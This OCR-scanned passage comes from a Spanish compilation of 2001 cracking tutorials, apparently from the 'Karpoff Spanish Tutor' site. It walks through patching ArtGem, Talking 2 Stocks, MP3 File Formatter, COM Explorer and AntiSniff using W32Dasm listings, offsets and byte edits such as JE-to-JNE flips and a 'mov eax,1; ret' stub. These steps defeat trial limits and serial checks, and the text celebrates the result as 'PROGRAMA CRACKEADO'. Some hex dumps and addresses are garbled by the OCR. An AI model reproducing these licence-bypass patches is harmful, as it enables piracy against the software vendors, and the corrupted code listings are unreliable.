de serie, pero el programa comprueba si es correcto cada vez que lo ejecutamos. Es decir, tendriamos que 
eliminar tambien esta proteccion, no es muy dificil, pero aqui no puedo instalar el Softlce (estoy en la oficina 


51). 


Asi que nos iremos a por la "limitacion" de tiempo. 


AL ATAKE 


Para cualquier programa que queramos estudiar lo mejor siempre es informarnos lo mas posible sobre nuestra victima (si esta empacado, encriptado, etc). 
En este caso nada de nada, asi que procedemos a adelantar la fecha del sistema, ejecutar el programa y ver que pasa. 


Bueno, pues parece que el programa se ejecuta igual, la unica diferencia es el numero de dias que tenemos de evaluacion en la nag o el mensaje de que ya 
ha expirado, pero continua funcionando. 


Como esta es la unica diferencia, apuntamos una cadena que siempre aparece, arriba del todo, en la nag: ArtGem 30 Days Trial. (Tomar siempre notas de 
todos los pasos que deis, aunque parezcan tonterias, siempre es buena toda la informacion). 


Es el turno de W32Dasm. Lo abrimos y desensamblamos el programa (previamente habremos hecho una copia de este, por si nos la cargamos). Nos 
vamos a String Data References, alli buscamos nuestra cadena: ArtGem 30 Days Trial 
Mirar bien si aparece mas de una vez, para asegurarnos en que zona (o zonas) del codigo tenemos que trabajar. En este caso solo aparece una vez. 


Aparecemos aqui: 


Como podemos ver a esta parte del codigo llegamos desde dos sitios diferentes (dos call): 4MADBA y 42AE25 (mira arriba del todo en el trozo de codigo 
que he puesto). 
Justo encima de la linea 0042A378 hace un test AX,AX y en 0042A37A hace je 0042A3El, justo despues de la llamada que nos mostraria este mensaje. 


Nos ponemos sobre esta linea (0042A37A je 0042A3El1), apuntamos su offset y nos vamos al editor hexadecimal. Tendremos esto: 


E a PARES a AS e 
'» ie Pda! 


a 5 a 


cl st SP 
510D a 2 2093 16FC TF 410 | .IISR.F .0.2..tM..RP2.? ..... 
97390 . 
DJE8S : E : 2BUZ E 0 ZW +]. 
F>FE : : 558 TR A O ES 
m1 mann am 5ñ 51 1A5R + a - -POj ATA. 
67F7 FF8z : 5489 : : q. E A A 


Cambiamos el 74 por 73 y ya esta, la nag no aparecera mas y el programa funciona perfectamente. 
Si os fijais, en la linea 00424382 tambien aparece un salto condicional a la linea que nos evita la nag, pero con modofocar la primera vale. 


Esto no evita que en el menu de ayuda desaparezca el boton para registrarnos, lo cual seria mas elegante. Facil, Buscamos la palabra "Register" en las 
String references del W32Dasm, apuntamos su offset y con el editor hexadecimal lo modificamos. Esto no lo explico, pues es igual que lo anterior, lo dejo 
como ejercicio. Si alguien quiere que se lo explique que me escriba y lo hare. 


Este tutorial se lo dedico a Karpoff, tu pagina es la mas visitada de mi empresa!!! Eres cojonudo!!! 


Para cualquiere pregunta sobre este tuto: lutino Oterra.es 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 
Talking 2 Stocks v 2.03 


Name/serial 


Parchar el programa para ser usuario registrado 


Principiante 
http://www.4developers.com/ 
w32dasm 8.9x 


Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como parchar el Talking 2 Stocks v 
2.03 de la empresa 4developers que se especializa en desarrollar utilerias para windows 
algunas muy buenas ........ como podran ver aumente una nueva seccion que se llama : 
VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se merece segun 

mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


El tut de hoy hablaremos sobre un programita buneo para quien necesite saber como va la bolsa de valores ... 
jejejje......... vamos a analizar el programa Talking 2 Stocks v 2.03 que ya veran como esta todo ....... 


Objetivos 
Parchar el programa para ser usuario registrado, sorry astaga , i know dont like you the patchs, :( 
Objetivos 

1. Parchar el programa para ser usuario registrado, sorry astaga , i know dont like you the patchs, : ( 
Manos a la Obra 


Bueno amigos empezemos con este menjurgue | !!!! J EJ EJ EJ E) ..... lo primero que haremos es analizar el programa para 
ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y nos mostrara esto: 


$ C Archivos de programaWT Stocks T Stock.exe 


mmmm.... esta hecho en visual C++y no esta empacado ni nada de nada...jejeje.... continuemos...... ahora abramos el 
programa y nos aparecera una ventana como esta: 


Talking Stock UNREGISTERED VERSION 


- mm — ——— 


Lo 


la que nos dice que es una version Trial y que tenemos 30 dias para probarlo, insertamos un nombre y numero de serie y 
damos click en UNLOCK y nos manda el siguiente mensaje: 


UNREGISTERED User 


IN 


OK! ahora vamos y desensamblamos el ejecutable del Talking 2 Stocks v 2.03 , esperamos unos segundos y por fin se 
desensambla, se acuerdan de el mensaje de error que manda ?.... ok vamos a buscarlo...... damos click en string 
E 


la : ; 
references ll nos aparece una ventana en la cual empezamos a buscar la string de error y despues de un ratito la 
encontramos : 


W32Dasm List of String Data Item 


damos doble click sobre esa string y nos manda a la dirección, damos doble click para ver si hay alguna otra referencia 
y pues parece que no.... que bueno ..... ok entonces caemos en esta parte del codigo : 


* Referenced by a (U)nconditional or (Cjonditional J ump at Address: 
| :00418F27(C) 
| 


* Possible Reference to Dialog: DialoglD_0115, CONTROL_ID:00FF, "" 


| 
:00419000 6AFF push FFFFFFFF 


* Reference To: USER32.MessageBeep, Ord:01BDh 


| 

:00419002 FF15CCF54500 Call dword ptr [0045F5CC] 
:00419008 85F6 test esi, esi 

:0041900A 7403 je 0041900F 

:0041900C 8B761C mov esi, dword ptr [esi+1C] 


* Referenced by a (U)nconditional or (Cjonditional J ump at Address: 
| :0041900A(C) 


| 
:0041900F 6A30 push 00000030 


* Possible StringData Ref from Data Obj ->'UNREGISTERED User" 


| 
:00419011 68448B4700 push 00478B44 


* Possible StringData Ref from Data Obj ->The registration information you " 
->have entered could not be validated." 


| 
:00419016 6810844700 push 00478A10 
:00419018B 56 push esi <---- CAEMOS AQUI 


OK !!! subimos un poco y nos encontramos que hay un salto condicional que viene de 00418F27 ...mmmmmm ... ok vamos 
a ese direccion de memoria y nos encontramos con esta otra parte del codigo : 


:00418F20 E8CB060000 call 004195FO 

:00418F25 85C0 test eax, eax 

:00418F27 0F84D3000000 je 00419000 <----CAEMOS AQUI 
:00418F2D 8B158CE84700 mov edx, dword ptr [0047E88C] 
:00418F33 8D442414 lea eax, dword ptr [esp+14] 
:00418F37 8D4C2408 lea ecx, dword ptr [esp+08] 
:00418F3B 33DB xor ebx, ebx 


como podemos ver caemos en el salto condicional en la direccion de memoria 00418F27 pero esperen no vayan como 
LOCOS a cambiar ese salto, ya que si solo lo cambian. lograran nada mas que aparesca el mensaje de registrado pero 
cuando reinicien el programa, no lo estaran ..... jejejejejj ...... si se dan cuenta una linea arriba hay un TEST y otra linea 
arriba una CALL mmmmmm interesante si tiene tiempo abran el softice y pongan un break point en GETWINDOWTEXTA y 
despues pongan un break point en la direccion donde esta ese TEST y vean los valores que lleva ..... 0 y 0 mmmmmmm 
....€so quiere decir que la CALL de arribita hace la comprobación del serial mandando un valor de CERO para no registrado 
y UNO para registrado ...... lo que se me ocurre es entrar a la CALL que se encuentra en esta direccion de memoria 
00418F20 y cambiar el codigo un poquitin para que mande como valor de default 1... jejejej ..... ok!!! hagamoslo ...... 
para empezar vamos y nos posicionamos en la direccion mencionada una linea arriba y en el W32Dasm y damos click en 


y nos manda a la direccion de memoria 004195F0 en la cual cambiaremos 
:004195F0 644100000000 mov eax, dword ptr fs:[00000000] 
por 
:004195F0 b801000000 mov eax,001 
:004195f6 C3 RET 


ok !!! se preguntaran y como cambio eso.... ok vamos y abrimos una copia del ejecutable del Talking 2 Stocks v 2.03 en 
el hex work Shop vamos y sacamos el offset de la direccion de memoria 4195F0 que es 195f0 damos CONTROL G en el 
heditor hexadecimal y aparecemos en esta parte del codigo pero en formato hexadecimal : 


000195£4/0800 0000 83C4 0803 9090 9090 MP o... 0... 


nada de ventana de registro y si se dan cuenta ya no aparece en la barra el texto de UNREGISTERED .......... J EJ EJ EJ E) 
E YA ESTUVO .... 

ahora si podemos decir ....... PROGRAMA CRACKEADO ....... 

nO0TAS 

ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 


cometo errores, si encuentras uno házmelo saber OK. 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
+ [DeK_0iN ] 
e. Act MAgO 
e. ¡TeD 
e SIR DREAM 
e POTHEAD 
e VluGo 
e CrKViz 
e Txeli 
e Kuato_Thor 
e CODE_MEX 
e Metamorfer 
e Txotxo 
e Raziel 
e Turbop 


e Karpoff http://welcome.to/ karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http://www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: MP3 File Formatter v 4.0 


PROTECCION: Name/serial 
: E ' , 
Objetivo: Ser usario registrado ...! cuestion de enfoques) en la cual veremos dos formas de poder crackear 
esta aplicación 
Descripcion: 
Dificultad: Principiante 
DOWNLOAD : http://www.patrickservices.com 
. W32dasm v 8.9 Editor Hexadecimal (hexWork Shop) 
Herramientas: 
CRACKER: Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos ..otra ves por aqui con un tuto mas para toda la peña que quiera aprender , les recuerdo que si 
eres o te crees un cracker experiementado, mejor no lo leas, y sigue soñando ;)P........... como podran ver 
aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion 
que se merece segun mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e Este programita es una utileria simpaticona para poder crear tus playlist para poder escuchar tus mp3's, lo estuve 
viendo y tiene algunas caracteristicas buenas, lo que no me gusto es que usa iconos para todo ... mmm guacala de 
pollo ...pero en si es una utileria buena. lo que haremos ahora es ver dos metodos diferentes para hacer el 
programa funcional y quitar todas sus limitaciones. .... ya saben lo de siempre si les gusta el programa 
comprenlo...no me hago responsable del mal uso que alguno de los vivillos que abundan en internet 
hagan de este tutoria...... 


Objetivos 


1. quitar el tiempo limite 
2. parchar el programa para que acepte cualquier numero de serie (les recuerdo que estos dos metodos que vamos a 
ver funcionan para todos los sharewares de esa empresa....... ) 


Manos a la Obra 


OK! ahora lo primero que haremos es usar la recien salidita version 4.2 del FILE INSPECTOR de VipeR, para saber con que 
esta hecho el programita y si viene empakado....... 


2 hle msPEctor v4.2001 


7 


ok chavos como podemos ver nos dice que esta hecho en Visual Basic v 5.0 y no esta empakado ni nada de eso, 
continuemos con este MEREQUETENGUE , ahora lo que hacemos es analizar el programa y lo ejecutamos, el cual nos 
mostrara una ventanita como esta : 


Register MP3 Filename Formattes ($15, 00) 


en la cual insertamos un nombre y numero de serie, y damos click en REGISTER y nos manda un mensaje de error: 


ll MP3 Filename Formattes 


X 


jejejje!!! como podemos ver por ahi podemos atacar, tambien si se dan cuenta en la ventana de registro dice algo como 
esto EXPIRED .... PLEASE REGISTER TODAY ..... mmm interesante, al ver estas palabras me recordo el viejo truco para 
quitar los tiempos limites de las aplicaciones hechas en Visula Basic v 5.0 y v 6.0, que les parece si lo intentamos 


Quitando tiempo limite (Primera aproximación) 


bueno amigos ahora veremos como quitar el tiempo limite de esta aplicación , la verdad este procedimiento es muy 
facil, y me ha servido para el 87% de las aplicaciones hechas en VB v 5.0 y v 6.0, consiste en buscar la string EXPIRED 
.... PLEASE REGISTER TODAY y despues la intruccion PUSH EBP que se encuentra arriba del mensaje...probemos a ver si 
es cierto.... ahora desensamblemos el ejecutable del MP3 Filename Formatter V4.0 y buscamos esa string y la 
enontramos : 


¡W32Dasm List of String Data Items 


y damos click en BUSCAR SIGUIENTE y caemos en la direccion de memoria : 


* Referenced by a CALL at Addresses: 
[:00441A2C , :00441D89 


| 
:00442390 53 push ebp <=======- CAEMOS AQUI 
:00442391 8BEC mov ebp, esp 


:00442393 83EC08 sub esp, 00000008 
:00442396 6856344000 push 00403456 


ok! encontramos lo que buscamos, ahora lo que hay que hacer es cambiar ese 00442390 55 push ebp por :00442390 
C3 ret , para eso vamos y abrimos una copia de el ejecutable en el editor hexadecimal y vemos su offset en el w32dasm 
que es 42390 y ya en el heditor hexadecimal damos control g y buscamos ese offset , caemos en esto : 


y guardamos los cambios y ejecutamos el programa yyyyyyyyyyy nada de ventana de registro ni tiempo limite........ se 
preguntaran por que cambie ese push por un ret... bueno mi razonamiento me dice que al poner ese ret nos nos deja 
ejecutar la rutina de comprobación y asi nos sigue ejecutando el programa, si estoy mal en mi razonamiento favor de 
mandarme un mail, !ok .....ahor asi jejejjeje creo que primer objetivo logrado.......... 


Parchando el programa (segunda aproximación) 


ok! amigos ahora veremos en la segunda aproximación como parchar el programa para que acepte un numero de serie 
cualquiera y nos ponga como usuarios registrados ..... empesemos....... lo primero es abrir el ejecutable en el 
desensamblador y si se dieron cuenta nos manda un mensaje que dice : 


A9ASA 


Ñ SBO 
ARAS 


si subimos un poco encontraremos un salto JGE en la direccion de memoria 45d5f2 pero ese salto no nos interesa 


sigamos subiendo y volvemos a encontrarnos con otro JGE en 45D3CS5 .... mmm creo que tampoco es el salto correcto 
sigamos subiendo.......... y nos encontramos con un salto interesante en : 


:0045D58F A1905B4700 mov eax, dword ptr [00475B90] 
:0045D594 0F8434010000 je 0045D6CE 

:0045D59A 3BC3 cmp eax, ebx 

:0045D59C 7510 ¡ne 0045DSAE 


mmmm....encontramos algo interesante .. ese salto segun la instruccion que aparece una linea arribita hace el salto al 
mensaje de error o continua su ejecución validando el codigo que insertamos y asi crear una registro en el registro de 
windows : 


[HKEY_CURRENT_USERNWSoftwareWVB and VBA Program SettingsIMP3FilenameFormattersetup] 
"owner"="profesor x" 
"serial"="1234567890" 


"original"="5266696C77796B796D6D" 


que les parece si vamos y cambiamos en la direccion de memoria 0045D594 ese 84 por un 85 osea que ese JE se 
convierta en JNE, ok! cambienlo e inserten sus datos nombre y serial falso y den click en el boton de register 


¡ MP3 Filename Formatter 


PROGRAMA CRACKEADO......... y) 
nO0TAS 
ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 


cometo errores, si encuentras uno házmelo saber OK. PROFESOR _X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
e [DeK_OiN] 
e. Act MAgO 
. ¡TeD 
+ SIRDREAM 
+ POTHEAD 
. VluGo 


e CrKViz 


e Txeli 

e Kuato_Thor 
+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: 
egeama Com Explorer v 1.61 
PROTECCION: Name / Serial 
Objetivo: Parchar el programa para ser usuario registrado 
Descripcion: 
Dificultad: Principiante 
DOWNLOAD: http://www.4developers.com/ 
Herramientas: W32Dasm v 8.93 , Hex Work Shop v 3.02 
CRACKER: Profesor_X FECHA: 15/04/2001 
INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como 
parchar el com Explorer v 1.61 de la empresa 4developers que se especializa en 
desarrollar utilerias para windows algunas muy buenas ........ como podran ver 
aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta 
los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e El Discurso de HOY HOY HOY ........ jejejejej .. ya me paresco a una persona de la alta esfera politica mexicana ... 
jejejje......... pero quiero comentarles que yo si les voy a dar soluciones ..... por lo menos en este tutorial ..... 
jejejeje vamos a analizar el programa COM Explorer v 1.61 que ya veran como esta todo ....... 


Objetivos 
1. Parchar el programa para ser usuario registrado, sorry astaga , i know dont like you the patchs, : ( 
Manos a la Obra 


Bueno amigos empezemos con este Taco al pastor | !!!! J EJ EJ EJ EJ ..... lo primero que haremos es analizar el programa 
para ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y nos mostrara esto: 


VArchivos de programa COME xplcomexp. exo 


mmmm.... esta hecho en visual C++y no esta empacado ni nada de nada...jejeje.... continuemos...... ahora abramos el 
programa y nos aparecera una ventana como esta: 


la que nos dice que es una version Trial y que tenemos 30 dias para probarlo, insertamos un nombre y numero de serie y 


damos click en UNLOCK y nos manda el siguiente mensaje: 


2. me p 
MUNREGISTERED User 


OK! ahora vamos y desensamblamos el ejecutable del COM Explorer v 1.61, esperamos unos segundos y por fin se 
desensambla, se acuerdan de el mensaje de error que manda ?.... ok vamos a buscarlo...... damos click en string 


references 
encontramos : 


y nos aparece una ventana en la cual empezamos a buscar la string de error y despues de un ratito la 


W32Dasm List of String Data Items 


damos doble click sobre esa string y nos manda a la dirección, damos doble click para ver si hay alguna otra referencia 
y pues parece que no.... que bueno ..... ok entonces caemos en esta parte del codigo : 


* Referenced by a (U)nconditional or (C)onditional J ump at Address: 
| :00409037(C) 


| 
:004090E8 G6AFF push FFFFFFFF 


* Reference To: USER32.MessageBeep, Ord: 01BDh 

| 

:004090EA FF15A0654400 Call dword ptr [004465A0] 
:004090F0O 85F6 test esi, esi 


:004090F2 7403 ¡e 004090F7 
:004090F4 8B761C mov esi, dword ptr [esi+1C] 


* Referenced by a (U)nconditional or (C)onditional J ump at Address: 
| :004090F2(C) 


| 
:004090F7 6A30 push 00000030 


* Possible StringData Ref from Data Obj ->'UNREGISTERED User" 


| 
:004090F9 6894714500 push 00457194 


* Possible StringData Ref from Data Obj ->The registration information you " 
->'have entered could not be validated." 


| 
:004090FE 6858704500 push 00457058 <o=ma==== CAEMOS AQUI 
:00409103 56 push esi 


OK !!! subimos un poco y nos encontramos que hay un salto condicional que viene de 00409037 ...mmmmmm ... ok vamos a 
ese direccion de memoria y nos encontramos con esta otra parte del codigo : 


* Referenced by a (U)nconditional or (Cjonditional J ump at Address: 
| :0040901F(C) 


| 

:00409030 E81BFBFFFF call 00408B50 

:00409035 85C0 test eax, eax 

:00409037 0F84AB000000 je 004090E8 <o==aam=== CAEMOS AQUI 
:0040903D 8B1590C04500 mov edx, dword ptr [0045C090] 
:00409043 8D44240C lea eax, dword ptr [esp+0C] 
:00409047 8D4C2408 lea ecx, dword ptr [esp+08] 
:0040904B 33DB xor ebx, ebx 

:0040904D 50 push eax 

:0040904E 51 push ecx 

:0040904F 53 push ebx 

:00409050 683F000F0O push O00FOO3F 

:00409055 53 push ebx 

:00409056 53 push ebx 

:00409057 53 push ebx 

:00409058 52 push edx 

:00409059 6802000080 push 80000002 

:0040905E 895C2430 mov dword ptr [esp+30], ebx 
:00409062 895C242C mov dword ptr [esp+2C], ebx 


como podemos ver caemos en el salto condicional en la direccion de memoria 00409037 pero esperen no vayan como 
LOCOS a cambiar ese salto, ya que si solo lo cambian. lograran nada mas que aparesca el mensaje de registrado pero 
cuando reinicien el programa, no lo estaran ..... jejejejejj ...... si se dan cuenta una linea arriba hay un TEST y otra linea 
arriba una CALL mmmmmm interesante si tiene tiempo abran el softice y pongan un break point en GETWINDOWTEXTA y 
despues pongan un break point en la direccion donde esta ese TEST y vean los valores que lleva ..... 0 y 0 mmmmmmm 
....€so quiere decir que la CALL de arribita hace la comprobación del serial mandando un valor de CERO para no registrado 
y UNO para registrado ...... lo que se me ocurre es entrar a la CALL que se encuentra en esta direccion de memoria 
00409030 y cambiar el codigo un poquitin para que mande como valor de default 1... jejejej ..... ok!!! hagamoslo ...... 
para empezar vamos y nos posicionamos en la direccion mencionada una linea arriba y en el W32Dasm y damos click en 


y nos manda a la direccion de memoria 00408B50 en la cual sobre escribiremos 
:00408B50 644100000000 mov eax, dword ptr fs:[00000000] 
por 
:00408B50 b801000000 mov eax, 001 
:00408B51 C3 RET 


ok !!! se preguntaran y como cambio eso.... ok vamos y abrimos una copia del ejecutable del Com Explorer v 1.61 en el hex 
work Shop vamos y sacamos el offset de la direccion de memoria 408B50 que es 8850 damos CONTROL G en el heditor 
hexadecimal y aparecemos en esta parte del codigo pero en formato hexadecimal : 


00008B4A|5 
Gncisa > 


nada de ventana de registro y si se dan cuenta ya no aparece en la barra el texto de UNREGISTERED .......... J EJ EJ EJ EJ 
oia YA ESTUVO .... 


ahora si podemos decir ....... PROGRAMA CRACKEADO ....... 


nOTAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


+ [DeK_OiN ] 
e Act MAgO 
e. ¡TeD 

e SIR DREAM 
e POTHEAD 
e VluGo 

e CrKViz 

e Txeli 

e Kuato_Thor 
e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 


muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 2001 
AntiSniff v 1.02.1 


PROTECCION: Serial 
Objetivo: Parchar el programa 
Descripcion: 
Dificultad: Principiante 
DOWNLOAD : http://www. securitysoftwaretech.com/ 
e W32Dasm v 8.9 
Herramientas: e Hex Work Shop v 3.0 
CRACKER: Profesor_X FECHA: 15/04/2001 
INTRODUCCION 


Amigos espero que se encuentren ya mas avanzados en este mundillo del cracking, por cierto un saludo para 
DEK_OIN, Actmago y KUATO THOR, TXELI los cuales son mis grandes amigos y con los que comparto mis 


experiencias y viceversa...... jejejejjeje...... bueno empezemos con es MEN] URGUE, como se dice aqui en mi pais, 
A LO QUE TE TRAJE CHECHA, A POR CIERTO HOY, HOY HOY """ NO SE DE DONDE SE ME PEGO ESO """ 


J EJ EJ EJ EJ E...... 


AL ATAKE 


Comentario del Programa 


e El AntiSniff v 1.02.1 es una aplicación que nos sirve para poder detectar ataques, dirijidos a nuestra pcCERA tiene 
unas opciones buenas y una calidad buena en la programación , lo unico malo adivinen que es LA PROTECCIÓN ya 
que ellos te dan un numero de registro y tu debes de poner un UNLOCK CODE, eso queire decir que cada vez que lo 
instales tiene su propio UNLOCK CODE basados en el numero de registro que te dan... 


Objetivos 


1. PArchar el programa para que acepte cualquier UNLOCK CODE 


Manos a la Obra 


Pues si amigos empesemos con este tutorial, recuerden que la primera accion a realizar siempre debe de ser analizar el 
ejecutable para ver si esta empakado y con que lenguAje fue hecho, bueno para eso usamos el famoso File Inspector v 4.2 


y nos muestra lo siguiente: 


(5 hile msPEctor v4.2001 Al ES 


Compilado con Microsoft Visual C++ 5.0 


Signatura: 

55 88 EC 64 FF 68 00 94 47 00 68 FS EA 43 00 
54 AL 00 00 00 00 SO 64 59 25 00 00 00 00 83 EC 
58 53 56 57 99 65 ES FF 15 C4 02 47 00 33 > 


Versión de la DLL: 1 54 Información... 


Versión del SO: Ko Versión de la imagen: fo.o 


Versión del enlazador: 6.0 Versión del subsistema: fs. 


O S Abrir archivo... EQ Analizar (Y sale 


como podemos ver no esta empakado y esta hecho en Visual C++v 5.0, mmmm interesante, ahora lo siguiente sera analizar 
el programa ...lo ejecutamos y nos aparece ua ventana como esta: 


O el 
EN vd, 


Promiscuous Mode Interface Detection 


D 1999, LOphtHea w Industries! Inc 


contrae usng it To register, veto dowm your machine 
1D and visit the website al 
Peto ¿Zwyesa LOMA cor/antezrál/registiañion htrol 
Mactune 1D: Unlock 
416FD 123456789 
tivos 


seguida de la ventana principal del programa ... jejejjeje ... como pueden ver nos da un MACHINE ID y claro nosotros 
debemos poner el UNLOCK CODE, me imagino que cada vez y en cada PcERA el MACHINE ID es diferente ... jejejeje ..... OK 
insertemos un numero cualquiera y damos click en el boton de UNLOCK CODE y nos manda el siguiente mensaje: 


Bad unlock code! 
= y  Youhave entered aninvelid unlock code. Registration requires purchasing a 


22 yatiduntock code. 


jejejjejje... creo que por ahi tenemos dos formas de atacar, ya sea buscando el serial y buscando el salto que hace la 
comprobación de los serial basados en el string que aparece en ese mensaje de error, pero como me dijo mi abuelita, 
""" MIJITO SIEMPRE BUSCA LA FORMA MAS FACIL DE HACER LAS COSAS"”""" HAY MI ABUELITA TAN 


SABIA !!!!!! JEJEJEJEJJE) ....... pensando en eso me decidi a desensamblar el ejecutable y buscar la string que 
aparece en el mensaje de error y despues de un rato la encontramos : 


W32Dasm List of String Data ltems 


bueno ahora demos doble click sobre ese mensaje de error y nos manda a la dirección de memoria 


* Referenced by a (U)nconditional or (Cjonditional J ump at Address: 
| :00411B94(C) 


| 
:00411BDE 6840000500 push 00050040 


* Possible StringData Ref from Data Obj ->'Bad unlock code!" 


| 
:00411BE3 6840744800 push 00487440 


* Possible StringData Ref from Data Obj ->"You have entered an invalid unlock " 
->code. Registration requires purchasing " 
->a valid unlock code." 


| 
:00411BE8 68E0734800 push 004873E0 <-----CAEMOS AQUI 
:00411BED 53 push ebx 


A ode e ol ole e ol e od ol ole e lle e le ol ole ol e o od a ol ol e le od e ole e o ol e od ole e o ol RR a 


como podemos ver en esta parte del codigo de aqui arriba nos encontramos que el mensaje de error es llamado por un 
salto condicional que esta en la dirección de memoria 00411894 bueno pues vayamos a esa dirección y veamos que nos 
depara el codigo : 


:00411B90 3B742424 cmp esi, dword ptr [esp+24] 
:00411B94 7548 jne 00411BDE <-----salto interesante 


bueno amigos veamos estas dos lineas de codigo las cuales nos muestran que en la dirección de memoria 00411B90 
hacemos una comparación del valor que contiene el acumulador ESI con el valor que trae ESP sumandole 24 ...mmm 
.. Interesante ..... y una linea abajo un salto condicional si no es igual salta al mensaje de error y si es igual no salta y 
manda el mensaje de registro valido...... mmm..... que les parece si cambiamos ese salto JNE por un JE para que 
cuando insertemos cualquier numero nos registre el codigo, ok! vayamos y saquemos su offset que es : 11B94 vamos y 
abrimos una copia del ejecutable del ANtiSniff con el Hexowrk shop y damos control g y en la ventana que aparece 
pones el offset, damos click en ok! y nos mada a la parte del codigo que hay que cambiar.. y cambiamos : 


D0011B8E|75C5 3B74 2424 48 BB4C 2414 8D44|u.:t5 «LS. 
00011B9C|2424 6404 SOGA 0453 6860 7548 0051|553.Pj.Sh'uH. '0 | 


por 


D0011B9E|75C5 3B74 2424 48 8B4C 2414 8D44|ju.:t55BH.LS..D 
D0011B9C|2424 6404 5064 0453 6860 7548 0051|553.Pj.Sh'uH.Q 


guardamos los cambios y ejecutamos el antisniff e insertamos cualquier UNLOCK CODE damos en UNLOCK click 


yyyyyyyyyy!!! nos sale el mensaje de CODE VALID THANKS ........ BLA BAL BLA .... ok parece que ya quedo , pero 
antes comprobemos si es cierto... salgamos del programa y ejecutemoslo de nuevo para ver si conserva el registro 


yyyyyyyyyy!!!! jajajajajajajajaja sigue registrado....... que facilisimo fue este programilla .. bueno para nosotros y malo 


nO0TAS 


ESPERO les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR _X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


e [DeK_OiN ] 
e Act MAgO 
e SIR DREAM 
e POTHEAD 
e VluGo 

e Txeli 

e Kuato_Thor 
e CODE_MEX 
e Metamorfer 
e Txotxo 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


